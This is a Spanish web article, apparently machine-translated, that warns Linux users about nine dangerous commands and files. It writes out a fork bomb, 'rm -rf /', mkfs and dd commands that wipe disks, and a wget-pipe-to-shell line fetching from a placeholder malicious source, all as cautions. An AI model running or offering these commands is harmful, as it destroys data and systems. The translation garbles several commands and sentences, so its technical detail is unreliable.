9 Linux debe ser usado cuidadosamente para resumir

  
        

Hay algunas cosas que se deben tener en cuenta: algunos comandos solo son perjudiciales si tienen un prefijo sudo en Ubuntu. Otras distribuciones de Linux son dañinas cuando se usan como comandos de raíz.

1. Linux Fork Bomb Command

: () {:: &};: Conocido como Fork Bomb, es un sistema Linux que niega los ataques de servicio. : () {:: &};: es una función de bash. Mientras se ejecute, lo repetirá hasta que el sistema se congele.

Solo puedes reiniciar el sistema para resolver este problema. Así que asegúrese de prestar atención cuando ejecute este comando en la interfaz de Linux.

2, Mv Folder /Dev /Null Command

mv folder /dev /null también es un comando peligroso. Dev /null o null device es un archivo de dispositivo que elimina todos los datos escritos en este archivo de dispositivo, pero el indicador de operación es exitoso para la operación de escritura. Esto es lo que a menudo llamamos bit bucked o agujero negro.

3, Rm -Rf Command

El comando rm -rf puede eliminar rápidamente las carpetas y su contenido en los sistemas Linux. Si no sabes cómo usarlo correctamente, simplemente lloras.

Las siguientes son las combinaciones y opciones más comunes para el comando m-rf:

comando rm: eliminar archivos del sistema Linux

comando rm -f: eliminar archivos sin preguntar Archivo de solo lectura en

rm -r comando: para eliminar el contenido de la carpeta

rm -d comando: eliminar el directorio vacío, si el directorio no está vacío, la operación no se realizará

rm -rf /command: comando para eliminar todo el contenido y subcarpetas (incluidos los archivos protegidos contra escritura) en el directorio raíz

comando rm -rf *: para eliminar todo lo que está en el directorio actual (trabajo actual Directorio) y carpeta de palabras

rm -rf. Command: fuerza la eliminación de todo en el directorio /subdirectorio de la carpeta actual. Igual que rm -r. [^.] *

El comando rm -r. [^.] *: Eliminar archivos y carpetas con indicaciones de eliminación

4, Mkfs Command

Si no conoce la función de mkfs, entonces también es un comando peligroso, cualquier comando escrito después de mkfs será formateado y reemplazado por un sistema de archivos de Linux en blanco.

A continuación se enumeran los comandos que requieren privilegios de administrador para formatear el disco duro:

mkfs

mkfs.ext3

mkfs.bfs

mkfs.ext2

mkfs.minix

mkfs.msdos mkfs.reiserfs

mkfs.vfat

mkfs.cramfs también se puede hacer con el código anterior Lo mismo, pero no necesita administrar permisos de código fuente.

5, Tar Bomb

El comando tar se utiliza para colocar varios archivos en un archivo (archivo) en formato .tar. La bomba Tape Archive (Tar) puede ser creada por él.

Cuando se comprime, este archivo de archivo genera decenas de miles de archivos con nombres similares que aparecen en el directorio actual en lugar del nuevo.

Cuando reciba un archivo tar, cree periódicamente un nuevo directorio protegido y luego coloque el archivo tar aceptado en este directorio antes de descomprimirlo, puede evitar ser víctima de la bomba tar.

6, Comando Dd

El comando Dd? se usa para copiar &cambiar la partición del disco duro. Si usas el lugar equivocado, entonces es muy peligroso.

Los siguientes comandos de dd están listados:

dd if = /dev /hda of = /dev /hdb

dd if = /dev /hda of = /dev /sdb < Br>

dd if = algo de = /dev /hda

dd if = algo de = /dev /sda

El siguiente comando borrará todo el disco duro maestro: dd si = /dev /cero de = /dev /had

7, Código de script de shell

En ocasiones, puede que tenga problemas, le dé un archivo de script de shell, le permita descargar y Ejecutalo El script puede contener algún código malicioso o peligroso. El formulario de comando podría verse así: wget http: //some_malicious_source -O- sh. Wget descargará el script cuando sea un script estrecho.

8, Código fuente malicioso

Tal vez alguien te dé el código fuente para que puedas compilarlo. El código puede ser un código normal, pero hay algunos códigos maliciosos que se enmascaran en un código fuente grande, y si es así, su sistema está filmado. Cómo evitar? Solo acepte y compile el código fuente de la fuente confiable.

9, Decompression Bomb

Ha recibido un archivo comprimido y se le solicita que extraiga este archivo aparentemente pequeño, que puede ser tan pequeño como KB. De hecho, este pequeño archivo comprimido contiene datos altamente comprimidos.

Mientras se descompriman los archivos, se extraerán cientos de gigabytes de datos. En este momento, si los datos de gran tamaño llenan el disco duro y causan el tiempo de inactividad, las posibilidades son grandes. ¿Cómo evitarlo? O el viejo dicho, no se preocupe, qué archivos se reciben, por favor reciba el archivo fuente confiable.

Copyright © Conocimiento de Windows All Rights Reserved